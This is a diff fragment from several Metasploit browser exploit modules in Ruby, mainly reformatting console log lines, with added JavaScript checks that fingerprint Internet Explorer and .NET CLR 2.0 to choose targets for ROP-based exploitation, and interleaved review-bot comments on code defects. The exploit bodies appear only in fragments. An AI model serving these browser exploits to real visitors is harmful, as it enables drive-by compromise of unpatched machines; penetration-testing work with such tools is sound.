print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
|
||||
xul_name = rand_text_alpha(rand(100)+1)
|
||||
j_applet = rand_text_alpha(rand(100)+1)
|
||||
|
||||
|
@ -243,7 +243,7 @@ EOS
|
|||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
elsif request.uri =~ /\.xul$/
|
||||
print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending XUL")
|
||||
|
||||
js_file = rand_text_alpha(rand(100)+1)
|
||||
@js_func = rand_text_alpha(rand(32)+1)
|
||||
|
@ -267,7 +267,7 @@ EOS
|
|||
send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })
|
||||
|
||||
elsif request.uri =~ /\.js$/
|
||||
print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending JS")
|
||||
return if ((p = regenerate_payload(cli).encoded) == nil)
|
||||
|
||||
base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
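Review bot: `return if ((p = regenerate_payload(cli).encoded) == nil)` just below the new "Sending JS" status line cannot guard anything: if `regenerate_payload` returns nil, `.encoded` raises NoMethodError before the comparison runs, and if it returns a payload, `encoded` is a String and never nil. The sibling modules in this commit use `return if ((p = regenerate_payload(cli)) == nil)` and call `p.encoded` afterwards; doing the same here makes the guard effective and keeps the handler from dying with a backtrace instead of a clean skip. The `on_request_uri` body continues outside this hunk.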
|
||||
|
|
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
when /Windows NT/
|
||||
ret = target['Rets'][0]
|
||||
else
|
||||
print_status("Sending 404 to user agent: #{request['User-Agent']}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending 404 to user agent: #{request['User-Agent']}")
|
||||
cli.send_response(create_response(404, 'File not found'))
|
||||
return
|
||||
end
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"</object>" +
|
||||
"</html>"
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -128,7 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
|
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
|
@ -158,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending #{self.name} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
|
|
@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
# Not strictly a vuln check, but an exploitability check since a
|
||||
# specific version of .NET is required to make the ROP work.
|
||||
:vuln_test => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }",
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -151,28 +153,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent !~ /\.NET CLR 2\.0\.50727/
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727")
|
||||
return nil
|
||||
end
|
||||
|
||||
if agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[3]
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2]
|
||||
mytarget = ua_has_clr(cli,agent) ? targets[2] : nil
|
||||
elsif agent =~ /MSIE 8\.0/
|
||||
mytarget = targets[1]
|
||||
mytarget = ua_has_clr(cli,agent) ? targets[1] : nil
|
||||
else
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
||||
def ua_has_clr(cli, agent)
|
||||
if agent =~ /\.NET CLR 2\.0\.50727/
|
||||
return true
|
||||
end
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727")
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect)
|
||||
|
||||
mytarget = target
|
||||
if target.name == 'Automatic'
|
||||
|
@ -183,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
#print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}")
|
||||
#print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}")
|
||||
|
||||
buf_addr = mytarget.ret
|
||||
css_name = [buf_addr].pack('V') * (16 / 4)
|
||||
|
@ -193,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
uni_placeholder = Rex::Text.to_unicode(placeholder)
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect")
|
||||
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
|
@ -205,7 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
|
||||
|
||||
# Generate the ROP payload
|
||||
rvas = rvas_mscorie_v2()
|
||||
|
@ -309,7 +313,7 @@ EOS
|
|||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
elsif request.uri =~ /\.dll$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL")
|
||||
|
||||
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
|
||||
# use it's contents ...
|
||||
|
@ -340,7 +344,7 @@ EOS
|
|||
css = "\xff\xfe" + Rex::Text.to_unicode(css)
|
||||
css.gsub!(uni_placeholder, css_name)
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS")
|
||||
|
||||
send_response(cli, css, { 'Content-Type' => 'text/css' })
|
||||
|
||||
|
|
|
@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil,
|
||||
# If it's IE 8, then we need .net to bypass ASLR
|
||||
:vuln_test => %Q|
|
||||
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
|
||||
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
|
||||
}
|
||||
|,
|
||||
})
|
||||
|
||||
def initialize(info={})
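Review bot: In the new `:vuln_test` script, `is_vuln` is assigned only inside the IE 8 branch, so for IE 6/7 clients (still admitted by `:ua_maxver => "8.0"`) the result depends on whatever default the autopwn harness gives `is_vuln`, which is not visible here. If the comment's intent is that only IE 8 needs the .NET runtime, an explicit `} else { is_vuln = true; }` after the IE 8 block would make that decision local to the module instead of relying on the harness default. Separately, the leading `.` in `/.NET CLR 2\\.0\\.50727/` is unescaped and matches any character; `/\\.NET CLR 2\\.0\\.50727/` is what the comment describes. The enclosing `autopwn_info` call starts outside this hunk.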
|
||||
|
@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = auto_target(cli, request)
|
||||
if mytarget.nil?
|
||||
agent = request.headers['User-Agent']
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
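Review bot: The new print_error line interpolates the raw `User-Agent` header into the console output, and that value is chosen by the connecting client, so a header carrying control characters or terminal escape sequences is written straight to the operator's terminal. Quoting the value, e.g. `print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent.inspect}")`, keeps the message on one line and makes non-printable bytes visible; the same applies to the matching print_error in the `@ -90,11 +91,10` hunk below. The enclosing method starts outside this hunk.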
|
||||
|
@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
DATA
|
||||
|
||||
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...")
|
||||
send_response(cli, data, { 'Content-Type' => 'text/html' })
|
||||
return
|
||||
end
|
||||
|
@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
HTML
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
end
|
||||
|
|
|
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
@ -90,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /MSIE 6\.0/ or agent =~ /MSIE 7\.0/ or agent =~ /MSIE 8\.0/
|
||||
mytarget = targets[1]
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("Sending #{self.refname} redirect to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect (target: #{mytarget.name})...")
|
||||
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML (target: #{mytarget.name})...")
|
||||
|
||||
# Generate the ROP payload
|
||||
buf_addr = mytarget['SprayTarget']
|
||||
|
@ -205,7 +205,7 @@ EOS
|
|||
send_response_html(cli, content)
|
||||
|
||||
elsif request.uri =~ /\.dll$/
|
||||
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending DLL (target: #{mytarget.name})...")
|
||||
|
||||
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
|
||||
# use it's contents ...
|
||||
|
|